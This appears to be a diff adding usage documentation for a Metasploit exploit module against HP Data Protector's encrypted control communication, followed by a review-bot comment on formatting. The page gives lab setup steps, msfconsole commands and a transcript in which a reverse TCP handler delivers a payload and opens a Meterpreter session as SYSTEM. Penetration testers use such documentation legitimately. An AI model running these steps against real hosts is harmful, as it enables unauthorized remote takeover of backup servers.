| 1 | +HP Data Protector is an automated backup and recovery software for single-server to enterprise |
| 2 | +environments. It provides cross-platform, online backup of data for Microsoft Windows, Unix, |
| 3 | +and Linux operating systems. |
| 4 | + |
| 5 | +While the server is using Encrypted Control Communication, HP Data Protector allows a remote |
| 6 | +attacker to gain access without authentication, and gain arbitrary code execution under the |
| 7 | +context of SYSTEM. |
| 8 | + |
| 9 | + |
| 10 | +## Vulnerable Application |
| 11 | + |
| 12 | +HP Data Protector versions 7, 8, and 9 are known to be affected. |
| 13 | + |
| 14 | +hp_dataprotector_encrypted_comms was specifically tested against version 9.0.0 on Windows 2008. |
| 15 | + |
| 16 | +## Verification Steps |
| 17 | + |
| 18 | +**Installing HP Data Protector** |
| 19 | + |
| 20 | +Before installing HP Data Protector, a Windows domain controller is needed. This exploit was tested |
| 21 | +against [a Windows Server 2008 R2 SP1 domain controller](https://www.youtube.com/watch?v=Buj9oEgbRt8). |
| 22 | + |
| 23 | +After setting up the domain controller, double-click on the HP Data Protector installer, and you |
| 24 | +should see this screen: |
| 25 | + |
| 26 | + |
| 27 | + |
| 28 | +Click on **Install Data Protector**. And then the installer should ask you which installation type: |
| 29 | + |
| 30 | + |
| 31 | + |
| 32 | +Make sure to select **Cell Manager**, and click **Next**. Use all default settings. |
| 33 | + |
| 34 | +**Enabling Encrypted Communication** |
| 35 | + |
| 36 | +After the Setup Wizard is finished, we need to enable encrypted communication. First, open the |
| 37 | +Data Protector GUI: |
| 38 | + |
| 39 | + |
| 40 | + |
| 41 | +Click on **Clients**, and the local client from the tree. You should see the **Connection** tab on the |
| 42 | +right, click on that. |
| 43 | + |
| 44 | + |
| 45 | + |
| 46 | +Under the Connection tab, there should be an **Encrypted control communication** checkbox, make |
| 47 | +sure that is checked. And then click **Apply** |
| 48 | + |
| 49 | +**Using hp_dataprotector_encrypted_comms** |
| 50 | + |
| 51 | +After the encrypted communication is enabled, you are ready to use |
| 52 | +hp_dataprotector_encrypted_comms. Here is what you do: |
| 53 | + |
| 54 | +1. Start msfconsole |
| 55 | +2. Do: ```use exploit/windows/misc/hp_dataprotector_encrypted_comms``` |
| 56 | +3. Do: ```set RHOST [IP ADDRESS]``` |
| 57 | +4. Do: ```set PAYLOAD [PAYLOAD NAME]``` |
| 58 | +5. Set other options as needed |
| 59 | +6. Do: ```exploit```, and you should receive a session like the following: |
| 60 | + |
| 61 | +``` |
| 62 | +msf exploit(hp_dataprotector_encrypted_comms) > run |
| 63 | +
|
| 64 | +[*] Started reverse TCP handler on 172.16.23.1:4444 |
| 65 | +[*] 172.16.23.173:5555 - Initiating connection |
| 66 | +[*] 172.16.23.173:5555 - Establishing encrypted channel |
| 67 | +[*] 172.16.23.173:5555 - Sending payload |
| 68 | +[*] 172.16.23.173:5555 - Waiting for payload execution (this can take up to 30 seconds or so) |
| 69 | +[*] Sending stage (957999 bytes) to 172.16.23.173 |
| 70 | +[*] Meterpreter session 1 opened (172.16.23.1:4444 -> 172.16.23.173:49304) at 2016-06-06 22:16:54 -0500 |
| 71 | +
|
| 72 | +meterpreter > getuid |
| 73 | +Server username: NT AUTHORITY\SYSTEM |
| 74 | +``` |
| 75 | + |
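Review bot: the screenshot placeholders at lines 26, 30, 39 and 44 are empty, so the sentences "you should see this screen:" and "the installer should ask you which installation type:" at lines 24 and 28 point at nothing; either commit the images with the doc and reference them with markdown image links, or drop those sentences and describe the expected screen in words. Smaller points in the same hunk: the inline commands in the numbered list at lines 55-59 use triple backticks (```use exploit/windows/misc/hp_dataprotector_encrypted_comms```), which should be single backticks for inline code as in other module docs; step 6 says to run `exploit` while the transcript at line 62 shows `run`, so pick one for consistency; line 47 "And then click **Apply**" is missing its period; and the opening "While the server is using Encrypted Control Communication" at line 5 reads more clearly as "When Encrypted Control Communication is enabled on the Cell Manager", since lines 34-47 make that setting the precondition for the module. It would also help readers to state up front in Vulnerable Application that the module only applies when that setting is on, and to add a short Options section (RHOST, RPORT 5555 as seen in the transcript, PAYLOAD) in the format used by the other module docs.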